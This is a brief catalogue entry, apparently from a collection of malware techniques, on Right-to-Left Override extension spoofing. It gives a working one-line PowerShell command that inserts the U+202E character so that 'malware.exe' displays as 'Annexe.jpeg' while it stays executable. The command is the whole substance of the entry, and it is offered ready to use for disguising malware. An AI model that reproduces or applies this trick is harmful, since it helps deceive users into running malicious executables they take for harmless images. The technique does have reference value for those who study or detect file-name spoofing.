Windows PowerShell / Right-to-Left Override (RLO) Extension Spoofing
| Author | Jean-Pierre LESUEUR (DarkCoderSc) |
| Platform | Windows |
| Language | PowerShell |
| Technique | Right-to-Left Override (RLO) Extension Spoofing |
Description:
In this example malware.exe becomes Annexe.jpeg but keeps its executable properties.
Code
Rename-Item -Path malware.exe -NewName ("Ann" + ( [char]0x202E) + "gepj.exe")Created
August 3, 2023
Last Revised
April 22, 2024